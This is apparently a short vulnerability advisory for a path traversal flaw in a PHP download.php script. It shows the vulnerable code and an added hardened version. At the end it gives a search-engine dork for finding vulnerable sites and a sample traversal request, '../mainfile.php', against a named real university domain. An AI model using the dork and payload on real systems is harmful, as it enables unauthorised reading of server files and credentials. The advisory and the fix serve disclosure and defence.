===========================================
Bug : Remote File Disclosure Vulnerability
Vendor : unknown
Author : Xshadow
Contact : admin[a]cukdus[dot]org
Visit : http://xshadow-power[dot]com
===========================================
[o]Vulnerable file
download.php

<?php
// The file name comes straight from the query string and is glued onto the
// dokumen/ prefix with no validation, so "../" sequences walk out of that
// directory and any file readable by the web server is sent to the client.
$filename=$_GET["filename"];
$fullpath="dokumen/".$filename;
session_cache_limiter("public, post-check=50");
header("Cache-Control: private");
header("Content-Type: application/zip");
header("Content-Length: ".filesize($fullpath));
header("Content-Disposition: attachment; filename=$filename");
readfile($fullpath);
?>
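
A hardened version of the same script, added here as an example and not the vendor's code. It assumes the archives live in a dokumen directory next to the script and that only .zip files are meant to be downloadable; the helper name resolve_download_path is my own choice.

```php
<?php
// Hardened download.php (added example, not the original vendor code).
// Assumptions: archives live in ./dokumen next to this script and only
// .zip files are meant to be downloadable.

// Return the resolved path of $filename inside $baseDir, or null if the
// request must be refused. Keeping the check in one function makes it
// easy to unit-test with inputs such as "../mainfile.php".
function resolve_download_path(string $baseDir, string $filename): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Allowlist a plain file name: letters, digits, dot, underscore, dash.
    // This rejects slashes, backslashes and NUL bytes outright; "." and ".."
    // pass the character class, so they are refused explicitly.
    if ($filename === '.' || $filename === '..'
        || !preg_match('/^[A-Za-z0-9._-]+$/', $filename)) {
        return null;
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $filename);
    // realpath() resolves symlinks too, so a link pointing out of dokumen/
    // fails the prefix check below even though its name looked harmless.
    if ($full === false || !is_file($full)
        || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // Serve only the file type the Content-Type header promises.
    if (strtolower(pathinfo($full, PATHINFO_EXTENSION)) !== 'zip') {
        return null;
    }
    return $full;
}

$fullpath = resolve_download_path(__DIR__ . '/dokumen', $_GET['filename'] ?? '');
if ($fullpath === null) {
    http_response_code(404);
    exit('File not found');
}

header('Cache-Control: private');
header('Content-Type: application/zip');
header('Content-Length: ' . filesize($fullpath));
// Quote the name and use the resolved basename, never the raw query value.
header('Content-Disposition: attachment; filename="' . basename($fullpath) . '"');
readfile($fullpath);
```

With this in place a request for filename=../mainfile.php is refused by the allowlist before any filesystem call, and a symlinked or non-zip file inside dokumen/ is refused by the realpath and extension checks.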

dork: download.php?filename= site:my

Sample: http://chemical.eng.um.edu.my/download.php?filename=../mainfile.php
